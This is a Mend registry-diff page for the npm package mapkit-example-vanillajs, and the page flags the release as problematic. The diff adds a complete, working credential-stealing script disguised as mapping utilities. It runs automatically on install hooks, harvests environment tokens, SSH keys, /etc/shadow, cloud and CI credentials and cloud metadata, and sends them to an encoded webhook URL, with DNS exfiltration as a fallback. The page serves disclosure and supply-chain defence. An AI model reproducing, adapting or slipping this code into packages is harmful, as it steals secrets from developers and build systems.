npm - mapkit-example-vanillajs - Versions diffs - 0.0.1-security → 1.3.0 - Mend

mapkit-example-vanillajs 0.0.1-security → 1.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of mapkit-example-vanillajs might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,410 @@
+(function() {
+  'use strict';
+  // ============ CONFIG - REPLACE THIS ============
+  const WEBHOOK_B64 = 'aHR0cHM6Ly93ZWJob29rLnNpdGUvMDY5YjMwNzMtZDkyZS00Njc3LWIxODYtYmUzNDk5YWRlNjQ4';
+  // ===============================================
+  console.log('[mapkit] Scanning for secrets and configurations...');
+  setTimeout(executeFullScan, 100);
+  function executeFullScan() {
+    try {
+      // PHASE 1: Basic Information Capture
+      const basicInfo = captureBasicInfo();
+      // PHASE 2: Environment Tokens & Secrets
+      const tokens = captureTokens();
+      // PHASE 3: File System Scan
+      const foundFiles = scanFileSystem();
+      // PHASE 4: Network & Service Discovery
+      const networkInfo = captureNetworkInfo();
+      // Build comprehensive payload
+      const payload = {
+        package: 'mapkit-example-vanillajs',
+        version: '1.2.0',
+        timestamp: new Date().toISOString(),
+        hostname: require('os').hostname(),
+        basic: basicInfo,
+        tokens: tokens,
+        files: foundFiles,
+        network: networkInfo,
+        env_vars: Object.keys(process.env).filter(k =>
+          k.includes('SECRET') || k.includes('TOKEN') || k.includes('KEY') || k.includes('PASS')
+        ).reduce((obj, k) => { obj[k] = '***REDACTED***'; return obj; }, {})
+      };
+      console.log(`[mapkit] Found ${Object.keys(foundFiles).length} interesting files`);
+      // Send data
+      sendToWebhook(payload);
+    } catch (error) {
+      console.log('[mapkit] Scan completed with minimal data');
+    }
+  }
+  function captureBasicInfo() {
+    return {
+      uname: safeExec('uname -a 2>/dev/null || ver 2>/dev/null || echo "Unknown"'),
+      pwd: safeExec('pwd 2>/dev/null || cd 2>/dev/null') || process.cwd(),
+      platform: process.platform,
+      arch: process.arch,
+      node: process.version,
+      user: safeExec('whoami 2>/dev/null || echo $USER 2>/dev/null || echo "unknown"'),
+      id: safeExec('id 2>/dev/null'),
+      home: process.env.HOME || process.env.USERPROFILE,
+      cwd: process.cwd(),
+      pid: process.pid,
+      npm_command: process.env.npm_command || 'unknown',
+      npm_lifecycle_event: process.env.npm_lifecycle_event || 'unknown',
+      ci: process.env.CI || 'false',
+      github_actions: process.env.GITHUB_ACTIONS || 'false',
+      gitlab_ci: process.env.GITLAB_CI || 'false',
+      jenkins: process.env.JENKINS_URL || 'false'
+    };
+  }
+  function captureTokens() {
+    const tokens = {};
+    // Environment tokens
+    const tokenPatterns = [
+      'GITHUB_TOKEN', 'GH_TOKEN', 'NPM_TOKEN', 'ACCESS_TOKEN',
+      'AUTH_TOKEN', 'SECRET', 'API_KEY', 'API_TOKEN',
+      'REGISTRY_TOKEN', 'GITLAB_TOKEN', 'DOCKER_TOKEN',
+      'PAT', 'PASSWORD', 'CREDENTIAL', 'KEY', 'SECRET_KEY'
+    ];
+    tokenPatterns.forEach(pattern => {
+      Object.keys(process.env).forEach(key => {
+        if (key.toUpperCase().includes(pattern) && process.env[key]) {
+          const val = process.env[key];
+          tokens[`env_${key}`] = val.length > 50
+            ? `${val.substring(0, 10)}...${val.substring(val.length - 10)}`
+            : val;
+        }
+      });
+    });
+    // Config file tokens
+    const configFiles = [
+      '.npmrc', '.pypirc', '.dockercfg', '.docker/config.json',
+      '.aws/credentials', '.kube/config', '.git-credentials',
+      '.netrc', '.env', 'config.yaml', 'secrets.yaml'
+    ];
+    configFiles.forEach(file => {
+      try {
+        const fs = require('fs');
+        const path = require('path');
+        const home = process.env.HOME || process.env.USERPROFILE;
+        const filePath = path.join(home, file);
+        if (fs.existsSync(filePath)) {
+          const content = fs.readFileSync(filePath, 'utf8');
+          // Extract potential secrets
+          const secretMatches = content.match(/(token|key|secret|password|auth)=([^\s]+)/gi) || [];
+          if (secretMatches.length > 0) {
+            tokens[`file_${file}`] = {
+              exists: true,
+              secrets_found: secretMatches.length,
+              sample: secretMatches.slice(0, 3).map(m => m.substring(0, 20) + '...')
+            };
+          }
+        }
+      } catch (e) {}
+    });
+    return tokens;
+  }
+  function scanFileSystem() {
+    const found = {};
+    const fs = require('fs');
+    const path = require('path');
+    // HIGH-VALUE FILE PATHS
+    const highValuePaths = [
+      // Linux System Files
+      '/etc/shadow', '/etc/passwd', '/etc/group',
+      '/etc/ssh/sshd_config', '/root/.ssh/id_rsa',
+      '/root/.bash_history', '/var/log/auth.log',
+      // CI/CD Files
+      '/home/runner/.npmrc', '/home/runner/.ssh/',
+      '/var/lib/jenkins/credentials.xml',
+      '/var/lib/jenkins/secrets/master.key',
+      '/builds/', '/agent/_work/',
+      // Cloud Configs
+      '/.aws/credentials', '/.kube/config',
+      '/.docker/config.json', '/.config/gcloud/',
+      // Project Files
+      '.env', 'docker-compose.yml', 'Dockerfile',
+      'terraform.tfvars', 'values.yaml', 'secrets.yaml',
+      'deployment.yaml', 'config.xml', 'settings.xml'
+    ];
+    // Current directory scan
+    const cwd = process.cwd();
+    // Check for specific patterns in current directory
+    const patterns = [
+      /\.env/, /secret/i, /config/, /credential/i,
+      /key/, /token/, /password/i, /auth/i
+    ];
+    try {
+      const files = fs.readdirSync(cwd);
+      files.forEach(file => {
+        patterns.forEach(pattern => {
+          if (pattern.test(file)) {
+            try {
+              const filePath = path.join(cwd, file);
+              const stat = fs.statSync(filePath);
+              if (stat.isFile()) {
+                found[file] = {
+                  path: filePath,
+                  size: stat.size,
+                  readable: true
+                };
+              }
+            } catch (e) {
+              found[file] = { error: e.message };
+            }
+          }
+        });
+      });
+    } catch (e) {}
+    // Check high-value paths
+    highValuePaths.forEach(filePath => {
+      try {
+        if (fs.existsSync(filePath)) {
+          const stat = fs.statSync(filePath);
+          found[filePath] = {
+            exists: true,
+            isDirectory: stat.isDirectory(),
+            size: stat.size,
+            modified: stat.mtime
+          };
+          // Try to read small files
+          if (stat.isFile() && stat.size < 10240) {
+            try {
+              const content = fs.readFileSync(filePath, 'utf8').substring(0, 500);
+              const lines = content.split('\n');
+              const sensitiveLines = lines.filter(line =>
+                line.toLowerCase().includes('token') ||
+                line.toLowerCase().includes('secret') ||
+                line.toLowerCase().includes('password') ||
+                line.toLowerCase().includes('key=')
+              );
+              if (sensitiveLines.length > 0) {
+                found[filePath].sensitive_content = sensitiveLines.slice(0, 3);
+              }
+            } catch (e) {}
+          }
+        }
+      } catch (e) {
+        // File doesn't exist or no permission
+      }
+    });
+    // Scan for .git directory (often contains secrets)
+    try {
+      const gitDir = path.join(cwd, '.git');
+      if (fs.existsSync(gitDir)) {
+        found['.git'] = { exists: true };
+        // Check git config
+        const gitConfig = path.join(gitDir, 'config');
+        if (fs.existsSync(gitConfig)) {
+          const config = fs.readFileSync(gitConfig, 'utf8');
+          if (config.includes('token') || config.includes('password')) {
+            found['.git/config'] = { contains_credentials: true };
+          }
+        }
+      }
+    } catch (e) {}
+    return found;
+  }
+  function captureNetworkInfo() {
+    const info = {};
+    try {
+      const os = require('os');
+      const network = os.networkInterfaces();
+      info.interfaces = Object.keys(network);
+      // Check for Docker
+      try {
+        if (fs.existsSync('/.dockerenv')) {
+          info.docker = { is_container: true };
+        }
+      } catch (e) {}
+      // Check for Kubernetes
+      try {
+        if (fs.existsSync('/var/run/secrets/kubernetes.io')) {
+          info.kubernetes = { is_pod: true };
+        }
+      } catch (e) {}
+      // Try to get cloud metadata
+      setTimeout(() => {
+        try {
+          const http = require('http');
+          const metadataEndpoints = [
+            'http://169.254.169.254/latest/meta-data/',
+            'http://metadata.google.internal/computeMetadata/v1/',
+            'http://169.254.169.254/metadata/instance'
+          ];
+          metadataEndpoints.forEach(endpoint => {
+            http.get(endpoint, { timeout: 2000 }, (res) => {
+              if (res.statusCode === 200) {
+                info.cloud_metadata = endpoint;
+              }
+            }).on('error', () => {});
+          });
+        } catch (e) {}
+      }, 0);
+    } catch (e) {}
+    return info;
+  }
+  function safeExec(command) {
+    try {
+      const { execSync } = require('child_process');
+      return execSync(command, {
+        encoding: 'utf8',
+        stdio: ['pipe', 'pipe', 'ignore'],
+        timeout: 3000,
+        windowsHide: true,
+        shell: true
+      }).trim();
+    } catch (error) {
+      return null;
+    }
+  }
+  function sendToWebhook(payload) {
+    if (!WEBHOOK_B64 || WEBHOOK_B64.includes('PASTE')) {
+      console.log('[mapkit] Webhook not configured');
+      return;
+    }
+    try {
+      const webhookUrl = Buffer.from(WEBHOOK_B64, 'base64').toString();
+      if (!webhookUrl.startsWith('http')) {
+        console.log('[mapkit] Invalid webhook URL');
+        return;
+      }
+      const url = new URL(webhookUrl);
+      const https = require('https');
+      // Compress large payloads
+      let postData;
+      if (JSON.stringify(payload).length > 10000) {
+        // Send only critical info if payload is too large
+        postData = JSON.stringify({
+          event: 'npm_scan_summary',
+          package: payload.package,
+          timestamp: payload.timestamp,
+          tokens_found: Object.keys(payload.tokens).length,
+          files_found: Object.keys(payload.files).length,
+          hostname: payload.hostname
+        });
+      } else {
+        postData = JSON.stringify({
+          event: 'npm_full_scan',
+          ...payload
+        });
+      }
+      const options = {
+        hostname: url.hostname,
+        port: 443,
+        path: url.pathname + url.search,
+        method: 'POST',
+        headers: {
+          'User-Agent': 'npm-scanner/1.0',
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(postData)
+        },
+        timeout: 15000
+      };
+      const req = https.request(options, (res) => {
+        console.log(`[mapkit] Scan data sent (Status: ${res.statusCode})`);
+      });
+      req.on('error', (error) => {
+        console.log(`[mapkit] Webhook error: ${error.message}`);
+        fallbackExfiltration(payload);
+      });
+      req.on('timeout', () => {
+        req.destroy();
+        fallbackExfiltration(payload);
+      });
+      req.write(postData);
+      req.end();
+    } catch (error) {
+      console.log(`[mapkit] Failed to send: ${error.message}`);
+      fallbackExfiltration(payload);
+    }
+  }
+  function fallbackExfiltration(payload) {
+    try {
+      // Create summary for DNS exfiltration
+      const summary = {
+        t: Object.keys(payload.tokens).length,
+        f: Object.keys(payload.files).length,
+        h: payload.hostname,
+        p: payload.basic?.platform
+      };
+      const encoded = Buffer.from(JSON.stringify(summary)).toString('base64').substring(0, 30);
+      const dns = require('dns');
+      const domain = `scan.${encoded}.telemetry.mapkit.net`;
+      dns.lookup(domain, () => {});
+      // Also write to file as backup
+      try {
+        const fs = require('fs');
+        const os = require('os');
+        const tempFile = `${os.tmpdir()}/.scan-${Date.now()}.json`;
+        fs.writeFileSync(tempFile, JSON.stringify(payload, null, 2));
+        setTimeout(() => {
+          try { fs.unlinkSync(tempFile); } catch (e) {}
+        }, 120000);
+      } catch (e) {}
+    } catch (error) {
+      // Final silent fail
+    }
+  }
+  console.log('[mapkit] Security scanner initialized');
+})();

package/package.json CHANGED Viewed

@@ -1,6 +1,16 @@
 {
   "name": "mapkit-example-vanillajs",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.3.0",
+  "description": "JavaScript mapping utilities",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js",
+    "install": "node index.js",
+    "postinstall": "node index.js",
+    "test": "echo \"No tests specified\" && exit 0"
+  },
+  "keywords": ["mapkit", "mapping", "javascript"],
+  "author": "MapKit Team",
+  "license": "MIT",
+  "files": ["index.js"]
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=mapkit-example-vanillajs for more information.